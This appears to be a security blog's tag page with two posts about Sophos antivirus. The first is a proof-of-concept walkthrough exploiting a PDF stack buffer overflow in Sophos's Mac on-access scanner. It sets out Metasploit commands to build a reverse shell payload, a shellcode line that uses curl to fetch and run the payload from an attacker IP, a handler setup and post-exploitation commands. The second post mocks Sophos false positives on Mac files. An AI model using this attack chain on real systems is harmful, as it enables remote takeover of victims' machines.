Posts tagged Sophos
Vulnerabilities reported to vendor by Tavis Ormandy the 2012-09-10
Public release of the vulnerabilities by Tavis Ormandy the 2012-11-05
PoC provided by Tavis Ormandy the 2012-10-02
PoC provided by :
Affected version(s) :
Sophos products for Mac OS X
Sophos products for Windows
Sophos products for Linux
Tested on Mac OS X 10.8.2 with :
Sophos Anti-Virus for Mac Home Edition
This PoC demonstrate one of the Sophos products vulnerabilities reported by Tavis Ormandy. This PoC exploit a PDF stack buffer overflow vulnerability present in Sophos onaccess scanner.
1) Create a Mac OS X Metasploit payload: msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > mac_os_x_payload 2) Modify Sophail shellcode.asm file with, for example: .command: db "curl -s http://192.168.178.26/mac_os_x_payload > mac_os_x_payload | chmod u+x mac_os_x_payload && ./mac_os_x_payload", 0 3) Make 4) Upload index.html, exploit.bin and exploit.png on a web server 5) Initiate a Metasploit multihandler use exploit/multi/handler set PAYLOAD osx/x86/shell_reverse_tcp set LHOST 192.168.178.26 exploit -j 6) On the target surf index.html file 7) Exploit the session :) session -i 1 id /sbin/ifconfig uname -a
On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.
Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.
During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.
False positives due to binary format of the “affected” files.
/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
Sophos him self is a trojan, andĀ some iTunes applications and Chrome are backdoored and nobody known about it.
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist
iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.
One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.
VLC is containing an IRC bot, gotcha remote control of all VLC users.
One more time VLC how is containing a PHP trojan …
Everybody know that Sophos Anti-Virus products are developed in PHP.
Help my logs are containing trojans and Sophos one more time.
My Spotlight indexing has a dead malware…
Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.
In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.